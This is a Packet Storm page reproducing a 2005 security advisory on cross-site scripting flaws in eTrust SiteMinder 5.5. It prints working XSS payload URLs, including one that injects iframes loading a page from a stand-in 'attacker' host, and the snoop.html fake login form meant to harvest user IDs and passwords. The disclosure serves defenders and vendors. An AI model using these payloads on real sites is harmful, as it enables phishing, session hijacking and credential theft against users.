exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

siteminder55.txt

siteminder55.txt
Posted Jul 9, 2005
Authored by c0ntex

eTrust's Siteminder version 5.5 is susceptible to a cross site scripting flaw.

tags | advisory, xss
SHA-256 | aa2c033eff8646b9cfc3037a593681e860f61083de6e1dc818765ffc9dc70e6c

siteminder55.txt

Change Mirror Download
 /*
*****************************************************************************************************************
$ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 08 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for
commercial gain.
*****************************************************************************************************************

Siteminder
http://www3.ca.com/Solutions/Product.asp?ID=5262

"eTrust™ SiteMinder(r) is a market-leading, security and management
foundation for enterprise Web
applications with a centralized security infrastructure for managing
user authentication and
access. eTrust SiteMinder delivers the market's most advanced
security management capabilities
and enterprise-class site administration, reducing overall IT
operational cost and complexity.
eTrust SiteMinder enables the secure delivery of essential
information and applications to
employees, partners, suppliers and customers, and scales with
growing business needs.."

Siteminder is vulnerable to XSS whereby a user can tag HTML or
javascript on to various locations
in a URL or input field and have the script run in the local users
browser. This can be used to
perform phishing attacks, hijack users browser sessions or user
account information by redrawing
the login page of a site.

http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&
PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>

The following link will abuse the URL option by first logging the
user out of the site with a
timeout error, due to the fact that we send her off to another HTTPS
site, taking the user back to
the login page. Next, we open an IFRAME over the original login
fields with malicious Username and
Password input fields, whereby a user will then supply their login
details to a malicious site,
to be later harvested and used in an attack.

http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-
0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html">
<iframe bgcolor="white" src="https://attacker/snoop.html"
style="position: absolute; top:
270px; left: 15 px;"></iframe><iframe
src="https://attacker/snoop.html" style="position:
absolute; top: 270px; left: 15 px;"></iframe>

To test if you are vulnerable to this issue, you can tag the
following on to the end of a
siteminder URL. If it is successful, you should see the Google
homepage within an IFRAME.

"><iframe bgcolor="white" src="http://www.google.com"
style="position: absolute; top: 270px;
left: 15 px;"></iframe><iframe src="http://www.google.com"
style="position: absolute; top:
270px; left: 15 px;"></iframe>


/* snoop.html */
<html>
</head></head>
<body>
<form>
User ID
<input type="text" name="UserID">
<br>
Password:
<input type="text" name="Password">
<input type="submit" value="Submit">
</form>
</body>
</html>


I have contacted Netegrity via ca.com multiple times but received no
response, as such, users
should use a filtering technology like modsecurity to detect the
above described attacks until
a fix has been released.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close